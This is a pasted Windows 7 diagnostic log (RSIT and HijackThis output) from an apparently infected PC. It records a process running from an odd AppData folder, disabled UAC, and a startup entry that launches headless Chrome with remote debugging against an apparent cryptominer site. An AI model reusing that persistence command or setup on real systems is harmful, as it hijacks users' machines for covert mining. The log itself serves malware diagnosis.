R2 CscService;@%systemroot%\system32\cscsvc.dll,-200; C:\Windows\System32\svchost.exe [2009-07-14 27136]
R3 CCleanerPerformanceOptimizerService;CCleaner Performance Optimizer Service; C:\Program Files\CCleaner\CCleanerPerformanceOptimizerService.exe [2022-11-09 1003344]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86; C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2015-11-05 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2015-11-05 125112]
S2 HPSLPSVC;HP Network Devices Support; C:\Windows\system32\svchost.exe [2009-07-14 27136]
S3 AppMgmt;@appmgmts.dll,-3250; C:\Windows\system32\svchost.exe [2009-07-14 27136]
S3 GalaxyClientService;GalaxyClientService; C:\Program Files (x86)\GOG Galaxy\GalaxyClientService.exe [2020-06-13 1748552]
S3 GalaxyCommunication;GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [2020-02-24 6821960]
S3 IDriverT;InstallDriver Table Manager; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [2005-04-03 69632]
S3 MozillaMaintenance;Mozilla Maintenance Service; C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe [2022-12-01 231328]
S3 PeerDistSvc;@%SystemRoot%\system32\peerdistsvc.dll,-9000; C:\Windows\System32\svchost.exe [2009-07-14 27136]
S3 StorSvc;@%SystemRoot%\System32\StorSvc.dll,-100; C:\Windows\System32\svchost.exe [2009-07-14 27136]
S3 UmRdpService;@%SystemRoot%\system32\umrdp.dll,-1000; C:\Windows\System32\svchost.exe [2009-07-14 27136]
S4 aspnet_state;Stavová služba ASP.NET; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe [2015-11-05 51376]
S4 NetMsmqActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8195; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2015-11-05 135848]
S4 NetPipeActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8197; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2015-11-05 135848]
S4 NetTcpActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8199; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2015-11-05 135848]
S4 RapoRespondNa;RapoRespondNa; C:\Program Files (x86)\RapoRespondNa\RapoRespondNa.exe -system -token 5e227c []
-----------------EOF-----------------
Logfile of random's system information tool 1.10 (written by random/random)
Run by KAREL at 2022-12-10 11:47:04
Microsoft Windows 7 Professional Service Pack 1
System drive C: has 2 GB (2%) free of 71 GB
Total RAM: 3001 MB (50% free)
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 11:47:12, on 10.12.2022
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v8.00 (8.00.7601.17514)
Boot mode: Normal
Running processes:
C:\Users\KAREL\AppData\Roaming\ckgkr\corsve.exe
C:\Program Files\trend micro\KAREL.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = https://www.seznam.cz/?clid=22668
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://search.seznam.cz/?sourceid=quick ... earchTerms}
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.seznam.cz/?clid=22668
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = https://www.seznam.cz/?clid=22668
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://search.seznam.cz/?sourceid=quick ... earchTerms}
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.seznam.cz/?clid=22668
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe,
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O17 - HKLM\System\CCS\Services\Tcpip\..\{E28415F2-DD36-4578-8DA7-537087953C9F}: NameServer = 8.8.8.8,8.8.4.4
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: CCleaner Performance Optimizer Service (CCleanerPerformanceOptimizerService) - Piriform Software Ltd - C:\Program Files\CCleaner\CCleanerPerformanceOptimizerService.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: GalaxyClientService - GOG.com - C:\Program Files (x86)\GOG Galaxy\GalaxyClientService.exe
O23 - Service: GalaxyCommunication - GOG.com - C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
--
End of file - 4917 bytes
======Listing Processes======
\SystemRoot\System32\smss.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
wininit.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
C:\Windows\system32\services.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
"taskhost.exe"
"C:\Windows\system32\Dwm.exe"
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\Explorer.EXE
"C:\Windows\system32\WUDFHost.exe" -HostGUID:{193a1820-d9ac-4997-8c55-be817523f6aa} -IoEventPortName:HostProcess-e36a71db-9446-4554-92cf-f498d1e26b25 -SystemEventPortName:HostProcess-ed3a6956-62ea-4764-9efd-e1c997c33efa -IoCancelEventPortName:HostProcess-5da6228f-2b83-4359-afc7-eacc8c657cae -NonStateChangingEventPortName:HostProcess-32cfba49-d141-43ce-95b8-76e5cd36f1ba -ServiceSID:S-1-5-80-2652678385-582572993-1835434367-1344795993-749280709 -LifetimeId:2151ac0a-6ea4-422e-b86d-fc265ef8c2c7
C:\Windows\System32\svchost.exe -k secsvcs
"C:\Windows\System32\igfxtray.exe"
"C:\Windows\System32\hkcmd.exe"
"C:\Windows\System32\igfxpers.exe"
C:\Windows\system32\SearchIndexer.exe /Embedding
taskeng.exe {C2BEE4A9-7C0E-4A21-89AB-5F13323D3D07}
C:\Users\KAREL\AppData\Roaming\ckgkr\corsve.exe "C:\Users\KAREL\AppData\Roaming\ckgkr\corsve.dat"
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
"C:\Program Files\CCleaner\CCleanerPerformanceOptimizerService.exe"
"C:\Program Files\Mozilla Firefox\firefox.exe"
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.0.1514780633\481822948" -parentBuildID 20221128144904 -prefsHandle 1064 -prefMapHandle 1056 -prefsLen 28571 -prefMapSize 234015 -appDir "C:\Program Files\Mozilla Firefox\browser" - {17c73143-1239-4fce-a305-d5e3aa6e13b8} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 1148 11922958 gpu
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.1.1404449285\345913368" -parentBuildID 20221128144904 -prefsHandle 1280 -prefMapHandle 1276 -prefsLen 28616 -prefMapSize 234015 -appDir "C:\Program Files\Mozilla Firefox\browser" - {877eb6b6-6d77-4307-8ed5-5c56014f85a8} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 1304 1245d258 socket
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.2.1041317365\1209599669" -childID 1 -isForBrowser -prefsHandle 1920 -prefMapHandle 1560 -prefsLen 28808 -prefMapSize 234015 -jsInitHandle 872 -jsInitLen 246704 -a11yResourceId 64 -parentBuildID 20221128144904 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eff2761a-adeb-41d4-a015-b7675b662bca} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 1568 19d34558 tab
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.3.1532327201\57405661" -childID 2 -isForBrowser -prefsHandle 2840 -prefMapHandle 2836 -prefsLen 34286 -prefMapSize 234015 -jsInitHandle 872 -jsInitLen 246704 -a11yResourceId 64 -parentBuildID 20221128144904 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c85a9c6f-5989-46a6-9fdc-f3cba4bd423a} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 2852 1ee07558 tab
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.11.1303864253\24904238" -parentBuildID 20221128144904 -prefsHandle 1420 -prefMapHandle 4568 -prefsLen 34286 -prefMapSize 234015 -appDir "C:\Program Files\Mozilla Firefox\browser" - {334568d4-802a-4f9c-b0f0-fad533005a19} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 3868 206b1e58 rdd
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.12.318543571\1127553368" -parentBuildID 20221128144904 -sandboxingKind 1 -prefsHandle 3784 -prefMapHandle 3932 -prefsLen 34286 -prefMapSize 234015 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d6278df4-9c11-4d4a-b303-99fc01afd70b} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 4776 21afde58 utility
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.13.1906558241\1088851588" -parentBuildID 20221128144904 -sandboxingKind 0 -prefsHandle 8416 -prefMapHandle 8420 -prefsLen 34286 -prefMapSize 234015 -appDir "C:\Program Files\Mozilla Firefox\browser" - {de9cca4d-ba5e-4613-ad2f-28084671f2c3} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 8404 1fc21f58 utility
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.40.2008587875\609523111" -childID 36 -isForBrowser -prefsHandle 4736 -prefMapHandle 3644 -prefsLen 34286 -prefMapSize 234015 -jsInitHandle 872 -jsInitLen 246704 -a11yResourceId 64 -parentBuildID 20221128144904 -appDir "C:\Program Files\Mozilla Firefox\browser" - {18b5b08b-7ccb-4f9d-9c86-1ecc5eb5f977} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 8084 17aaec58 tab
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.41.904343850\998306174" -childID 37 -isForBrowser -prefsHandle 4364 -prefMapHandle 8512 -prefsLen 34286 -prefMapSize 234015 -jsInitHandle 872 -jsInitLen 246704 -a11yResourceId 64 -parentBuildID 20221128144904 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c49184c3-f335-436f-8e0c-8cff881394f6} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 4712 23ca2358 tab
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.42.660471742\676350570" -childID 38 -isForBrowser -prefsHandle 3760 -prefMapHandle 3936 -prefsLen 34286 -prefMapSize 234015 -jsInitHandle 872 -jsInitLen 246704 -a11yResourceId 64 -parentBuildID 20221128144904 -appDir "C:\Program Files\Mozilla Firefox\browser" - {927e2b24-3551-4dd0-898e-6965ec2cdb4d} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 7972 23e5c358 tab
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.43.1977308442\1865528447" -childID 39 -isForBrowser -prefsHandle 4108 -prefMapHandle 4792 -prefsLen 34286 -prefMapSize 234015 -jsInitHandle 872 -jsInitLen 246704 -a11yResourceId 64 -parentBuildID 20221128144904 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1dce0173-9b9a-405b-945f-9b3cb505b20c} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 8552 23a31b58 tab
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.44.1872515337\741879704" -childID 40 -isForBrowser -prefsHandle 7836 -prefMapHandle 7840 -prefsLen 34286 -prefMapSize 234015 -jsInitHandle 872 -jsInitLen 246704 -a11yResourceId 64 -parentBuildID 20221128144904 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c29eeab5-dfe2-4f9b-8e31-8d892eef0cdb} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 7856 24612058 tab
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe4_ Global\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\system32\SearchFilterHost.exe" 0 508 512 520 65536 516
"C:\Users\KAREL\Downloads\RSITx64.exe"
C:\Windows\system32\wbem\wmiprvse.exe
======Scheduled tasks folder======
C:\Windows\tasks\CCleanerCrashReporting.job - C:\Program Files\CCleaner\CCleanerBugReport.exe --product 90 --send dumps|report --path "C:\Program Files\CCleaner\LOG" --programpath "C:\Program Files\CCleaner" --configpath "C:\Program Files\CCleaner\Setup" --guid "515fbcf1-c488-4adb-87c8-d426745eb0a5" --version "6.06.10144" --silent
=========Mozilla firefox=========
ProfilePath - C:\Users\KAREL\AppData\Roaming\Mozilla\Firefox\Profiles\jzmbh3ho.default-release
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.4]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.6]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.8]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.11]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
======Registry dump======
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"=C:\Windows\system32\igfxtray.exe [2021-05-29 163384]
"HotKeysCmds"=C:\Windows\system32\hkcmd.exe [2021-05-29 387640]
"Persistence"=C:\Windows\system32\igfxpers.exe [2021-05-29 418360]
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AlcoholAutomount]
C:\Program Files (x86)\Alcohol Soft\Alcohol 120\AxAutoMntSrv.exe -automount []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CCleaner Monitoring]
C:\Program Files\CCleaner\CCleaner64.exe [2022-11-09 38650192]
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CCleaner Smart Cleaning]
C:\Program Files\CCleaner\CCleaner64.exe [2022-11-09 38650192]
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\chrome]
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --headless --disable-gpu --remote-debugging-port=9222 http://mi-ner-nis-de-6.info/cdn-1006.html?t=0.4 []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Launch LCore]
C:\Program Files\Logitech Gaming Software\LCore.exe /minimized []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\launchOnStartup]
C:\Program Files (x86)\GOG Galaxy\GalaxyClient.exe [2020-06-13 13971528]
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\M-Audio Taskbar Icon]
C:\Windows\system32\M-AudioTaskBarIcon.exe [2010-03-31 798728]
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Path]
C:\Program Files (x86)\ZOOM\Edit_Share\bin\ZOOM Edit&Share startup.exe []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PWRISOVM.EXE]
C:\Program Files\PowerISO\PWRISOVM.EXE [2018-06-17 456160]
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RTHDVCPL]
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Host Services x64.lnk]
C:\PROGRA~1\qemu\HOSTSE~1.EXE []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^Users^KAREL^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^SmartClock.lnk]
C:\Users\KAREL\AppData\Roaming\SMARTC~1\SMARTC~1.EXE []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\igfxcui]
C:\Windows\system32\igfxdev.dll [2021-05-29 272384]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"=credssp.dll
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AFD]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=0
"ConsentPromptBehaviorUser"=3
"EnableLUA"=0
"EnableUIADesktopToggle"=0
"PromptOnSecureDesktop"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoActiveDesktop"=1
"NoActiveDesktopChanges"=1
"ForceActiveDesktopOn"=0
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"vidc.mrle"=msrle32.dll
"vidc.msvc"=msvidc32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msg711"=msg711.acm
"msacm.msgsm610"=msgsm32.acm
"msacm.msadpcm"=msadp32.acm
"midimapper"=midimap.dll
"wavemapper"=msacm32.drv
"VIDC.UYVY"=msyuv.dll
"VIDC.YUY2"=msyuv.dll
"VIDC.YVYU"=msyuv.dll
"VIDC.IYUV"=iyuv_32.dll
"vidc.i420"=iyuv_32.dll
"VIDC.YVU9"=tsbyuv.dll
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"MSVideo8"=VfWWDM32.dll
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"aux1"=wdmaud.drv
"wave2"=wdmaud.drv
"mixer2"=wdmaud.drv
"wave3"=wdmaud.drv
"mixer3"=wdmaud.drv
"wave4"=wdmaud.drv
"midi2"=wdmaud.drv
"mixer4"=wdmaud.drv
"aux2"=wdmaud.drv
"wave5"=wdmaud.drv
"midi3"=wdmaud.drv
"mixer5"=wdmaud.drv
"aux3"=wdmaud.drv
"wave6"=wdmaud.drv
"mixer6"=wdmaud.drv
"wave7"=wdmaud.drv
"mixer7"=wdmaud.drv
"midi8"=wdmaud.drv
"aux4"=wdmaud.drv
"midi6"=wdmaud.drv
"midi7"=wdmaud.drv
"wave8"=wdmaud.drv
"midi4"=wdmaud.drv
"mixer8"=wdmaud.drv
"wave9"=wdmaud.drv
"midi5"=wdmaud.drv
"mixer9"=wdmaud.drv
"midi9"=wdmaud.drv
"aux5"=wdmaud.drv
"aux6"=wdmaud.drv
"aux7"=wdmaud.drv
"aux8"=wdmaud.drv
"aux9"=wdmaud.drv
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv
======File associations======
.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*
======List of files/folders created in the last 1 month======
2022-12-10 11:47:04 ----D---- C:\rsit
2022-12-10 07:18:46 ----D---- C:\ProgramData\Piriform
2022-12-01 19:27:16 ----D---- C:\Program Files\Mozilla Firefox
======List of files/folders modified in the last 1 month======
2022-12-10 11:47:12 ----D---- C:\Windows\Temp
2022-12-10 11:47:11 ----D---- C:\Program Files\trend micro
2022-12-10 11:47:08 ----D---- C:\Windows\Prefetch
2022-12-10 11:37:06 ----D---- C:\Windows\system32\drivers\etc
2022-12-10 11:32:55 ----D---- C:\Program Files\CCleaner
2022-12-10 11:07:16 ----D---- C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38
2022-12-10 07:18:46 ----HD---- C:\ProgramData
2022-12-10 06:59:46 ----D---- C:\Windows
2022-12-10 06:58:13 ----D---- C:\Windows\system32\Tasks
2022-12-10 06:58:11 ----D---- C:\Windows\Tasks
2022-12-08 15:46:26 ----D---- C:\Windows\system32\config
2022-12-08 15:42:50 ----SHD---- C:\System Volume Information
2022-12-03 15:15:04 ----D---- C:\Users\KAREL\AppData\Roaming\AIMP
2022-12-03 14:49:10 ----D---- C:\Windows\System32
2022-12-03 14:49:10 ----A---- C:\Windows\system32\PerfStringBackup.INI
2022-12-03 14:49:09 ----D---- C:\Windows\inf
2022-12-03 14:45:20 ----D---- C:\Program Files (x86)\Mozilla Maintenance Service
2022-12-02 15:52:05 ----D---- C:\Program Files
2022-11-26 10:13:03 ----D---- C:\Windows\SoftwareDistribution
2022-11-20 16:13:21 ----A---- C:\Windows\system32\msvcsv60.dll
2022-11-20 16:13:21 ----A---- C:\Users\KAREL\AppData\Roaming\msregsvv.dll
2022-11-20 10:41:08 ----D---- C:\Users\KAREL\AppData\Roaming\Tracktion
2022-11-19 05:27:17 ----D---- C:\Windows\system32\catroot2
2022-11-12 19:25:01 ----D---- C:\Users\KAREL\AppData\Roaming\vlc
======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys [2010-11-21 213888]
R0 sptd;sptd; C:\Windows\System32\Drivers\sptd.sys [2020-10-10 393880]
R1 CSC;@%systemroot%\system32\cscsvc.dll,-202; C:\Windows\system32\drivers\csc.sys [2010-11-21 514560]
R1 SCDEmu;SCDEmu; C:\Windows\system32\drivers\SCDEmu.sys [2017-06-07 138296]
R1 vwififlt;Virtual WiFi Filter Driver; C:\Windows\system32\DRIVERS\vwififlt.sys [2009-07-14 59904]
R2 MBAMChameleon;MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [2022-10-16 220752]
R3 AgereSoftModem;Agere Systems Soft Modem; C:\Windows\system32\DRIVERS\agrsm64.sys [2009-06-10 1146880]
R3 athr;Atheros Extensible Wireless LAN device driver; C:\Windows\system32\DRIVERS\athrx.sys [2011-10-20 2770944]
R3 BEHRINGER_2902;usb-audio.de driver for BEHRINGER USB AUDIO; C:\Windows\System32\Drivers\BUSB2902.sys [2009-10-30 460864]
R3 BUSB_AUDIO_WDM;BEHRINGER USB WDM AUDIO; C:\Windows\system32\drivers\busbwdm.sys [2009-10-30 49728]
R3 GEARAspiWDM;GEAR ASPI Filter Driver; C:\Windows\system32\DRIVERS\GEARAspiWDM.sys [2019-12-12 33240]
R3 igfx;igfx; C:\Windows\system32\DRIVERS\igdkmd64.sys [2021-05-29 10629408]
R3 NIWinCDEmu;ISO Mounter driver; C:\Windows\system32\DRIVERS\NIWinCDEmu.sys [2015-08-24 112408]
R3 vwifimp;Microsoft Virtual WiFi Miniport Service; C:\Windows\system32\DRIVERS\vwifimp.sys [2009-07-14 17920]
R3 WmBEnum;Logitech Virtual Bus Enumerator Driver; C:\Windows\system32\drivers\WmBEnum.sys [2010-04-27 26440]
R3 WmXlCore;Logitech Translation Layer Driver; C:\Windows\system32\drivers\WmXlCore.sys [2010-04-27 77512]
S0 Partizan;Partizan; C:\Windows\system32\drivers\Partizan.sys []
S3 aswTap;avast! SecureLine TAP Adapter v3; C:\Windows\system32\DRIVERS\aswTap.sys [2018-09-05 53904]
S3 BazisVirtualCDBus;WinCDEmu Virtual Bus Driver; C:\Windows\system32\DRIVERS\BazisVirtualCDBus.sys [2015-09-28 172376]
S3 cpuz148;cpuz148; \??\C:\Windows\temp\cpuz148\cpuz148_x64.sys []
S3 dmvsc;dmvsc; C:\Windows\system32\drivers\dmvsc.sys [2010-11-21 71168]
S3 dtlitescsibus;DAEMON Tools Lite Virtual SCSI Bus; C:\Windows\system32\DRIVERS\dtlitescsibus.sys [2016-12-29 30264]
S3 dtliteusbbus;DAEMON Tools Lite Virtual USB Bus; C:\Windows\system32\DRIVERS\dtliteusbbus.sys [2016-12-29 47672]
S3 fiddrv64;fiddrv64; C:\Windows\system32\drivers\fiddrv64.sys []
S3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\Windows\system32\drivers\RTKVHD64.sys []
